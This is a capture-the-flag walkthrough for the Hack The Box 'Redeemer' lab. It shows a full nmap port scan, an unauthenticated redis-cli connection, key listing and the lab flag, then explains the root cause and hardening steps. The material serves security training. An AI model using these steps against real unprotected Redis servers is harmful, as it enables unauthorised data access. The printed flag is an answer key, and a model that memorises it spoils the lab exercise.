🗄️ HTB Redeemer — Solution Notes

Platform: Hack The Box — Starting Point (Tier 0) Machine: Redeemer OS: Linux Difficulty: Very Easy Vulnerability Type: Misconfiguration

🗺️ Attack Chain

Nmap (all ports) → Redis discovery → Unauthenticated connection → List keys → Read flag

🧠 How Does a Hacker Think? — Before You Begin

On this machine, the initial nmap scan came back empty. This is unusual — because nmap by default only scans the 1000 most common ports. Some services run on non-standard ports.

1️⃣ Reconnaissance

Port Scanning

bash

nmap -p- --min-rate 5000 -sV 10.129.52.120

Parameter Breakdown:

Findings:

💡 What is Redis?

🧠 How Does a Hacker Think? — When You Find an Unauthenticated Service

You found the Redis port and confirmed the service can be accessed without authentication. So what do you do now?

2️⃣ Exploitation — Connecting to Redis and Reading the Flag

Step 1: Establish Connection

💡 What is redis-cli?

bash

redis-cli -h 10.129.52.120

Step 2: Server Info and Database Analysis

💡 The info Command

bash

info

In the # Keyspace section of the output:

db0:keys=4

→ Database 0 contains 4 keys.

Step 3: Select Database and List Keys

💡 The select and keys * Commands

bash

select 0 keys *

Output:

1) "numb" 2) "temp" 3) "stor" 4) "flag"

Step 4: Read the Flag

💡 The get Command

bash

get flag

Flag: 03e1d2b376c37ab3f5319922053953eb

🧠 How Does a Hacker Think? — Why Did This Vulnerability Exist?

Redis was designed as a performance-focused tool. Authentication is disabled by default because Redis is expected to run "on an internal network."

4️⃣ Technical Analysis — Root Cause and Remediation

Root Cause: The requirepass parameter is not set in redis.conf, and the service is exposed to the external network.

Remediation:

bash

# 1. Require a password requirepass <STR0NG_P4SSW0RD> # 2. Only allow access from localhost bind 127.0.0.1 # 3. Disable dangerous commands rename-command CONFIG "" rename-command FLUSHALL "" rename-command DEBUG ""

📚 Concepts Learned

• Full port scan: Using p- to find services on non-standard ports
• Redis: Unauthenticated key-value database
• redis-cli: Redis terminal client
• info: Retrieve server and database information
• keys *: List all keys
• get <key>: Read a key's value
• Misconfiguration: Wrong configuration = open door

🔑 General Hacker Mindset Summary

1. If the first scan returns nothing, use p- to scan all ports: Services can run outside the standard 1000 ports.
2. Unauthenticated service = direct access: Databases like Redis, MongoDB, and Elasticsearch can be wide open in default installs.
3. Use info to understand the state, keys * to see the contents: Once you're in a database, always check what's there first.
4. Misconfiguration is the most common vulnerability: It's human error, not technical bugs, that usually opens the door.